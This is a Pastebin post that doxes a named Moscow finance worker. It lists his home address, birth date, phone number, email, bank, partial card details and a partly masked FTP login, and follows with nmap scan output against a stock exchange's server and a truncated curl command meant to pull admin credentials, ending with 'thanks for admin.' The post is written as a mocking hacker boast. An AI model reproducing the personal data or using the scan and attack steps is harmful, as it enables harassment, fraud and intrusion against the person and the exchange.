Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Name- Sergey Demidov looking sexy http://matrixtxri745dfw.onion/neo/uploads/140828/MATRIXtxri745dfwONION_130904onU_savitskiy.jpg
- Address - Bolshoy Kislovsky 13, Moscow (bruh dat house tho.)
- DOB - Born April 10, 1972
- Place of Birth - Odessa
- Postal/ZIP code - 125009
- Phone - 7.4953633232
- Education - Russian Academy of Economics, studied with a speciality in finance and credit, in 1993 he became a finance operator for the department of foreign operations.
- Employement - work as a finance operator for a unnamed bank and since 2001 worked in stock exchange
- Email address - sergey88364@gmail.com
- Linkedin - http://ru.linkedin.com/pub/sergey-demidov/1/a0/b48
- Now for Lulz.
- Bank - Bank of Moscow (bm.ru)
- Paypal email - sergey88364@gmail.com (bruh, opsec)
- Card details - (only last 4 few cause fraud) 3461
- Expiry - 11/14
- TECH LULZ
- FTP - Sergeydem82:*****78 (if youre leet haxor you can hax teh stock xchange. if youre not, youll have to wait for us :)
- Initiating Ping Scan at 14:19
- Scanning moex.com (91.208.232.28) [4 ports]
- Completed Ping Scan at 14:19, 0.11s elapsed (1 total hosts)
- Initiating SYN Stealth Scan at 14:19
- Scanning moex.com (91.208.232.28) [9 ports]
- Discovered open port 443/tcp on 91.208.232.28
- Discovered open port 80/tcp on 91.208.232.28
- Completed SYN Stealth Scan at 14:19, 1.51s elapsed (9 total ports)
- Initiating OS detection (try #1) against moex.com (91.208.232.28)
- Retrying OS detection (try #2) against moex.com (91.208.232.28)
- Initiating Traceroute at 14:20
- Completed Traceroute at 14:20, 2.01s elapsed
- Nmap scan report for moex.com (91.208.232.28)
- Host is up (0.077s latency).
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 25/tcp filtered smtp
- 80/tcp open http
- 443/tcp open https
- 1433/tcp filtered ms-sql-s
- 3306/tcp filtered mysql
- 5900/tcp filtered vnc
- Aggressive OS guesses: Linux 2.6.24 (87%), Cyberoam UTM firewall (86%), Avaya Communication Manager (Linux 2.6.11) (86%), Citrix Access Gateway VPN gateway (86%), Juniper SA4000 SSL VPN gateway (IVE OS 7.0) (86%), Linux 2.6.11 (86%), Cymphonix EX550 firewall (86%), Endian 2.3 or IPCop firewall 1.4.10 - 1.4.21 (Linux 2.4.31 - 2.6.22) (86%), F5 BIG-IP load balancer (86%), OpenWrt (Linux 2.4.32) (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 11 hops
- TCP Sequence Prediction: Difficulty=265 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 0.85 ms bb0-vlan50-th1.59-bdp.TeenTelecom.net (86.107.58.33)
- 2 1.85 ms 172.16.14.1
- 3 15.86 ms 192.168.249.177
- 4 6.87 ms hurricane-electric.interlan.ro (86.104.125.69)
- 5 27.87 ms 10ge15-7.core1.fra1.he.net (184.105.223.241)
- 6 79.85 ms 216.66.87.134
- 7 76.87 ms 95.167.91.197
- 8 78.88 ms MAcom-SVAL26-rt.MAcomnet.net (188.254.31.190)
- 9 77.89 ms FastEthernet0-0.ncc-8n.MAcomnet.NET (195.128.64.69)
- 10 ...
- 11 74.72 ms 91.208.232.28
- OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.12 seconds
- Raw packets sent: 121 (9.632KB) | Rcvd: 104 (6.330KB)
- THIS SHIT IS RUNNING FUCKING OLD ASS Cyberoam UTM.
- Lets pwn it.
- curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: yandex.ru" "http://91.208.232.28>/NOTREVEALINGCAUSESKIDS(adminusername|passwd
- value)'
- thanks for admin.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement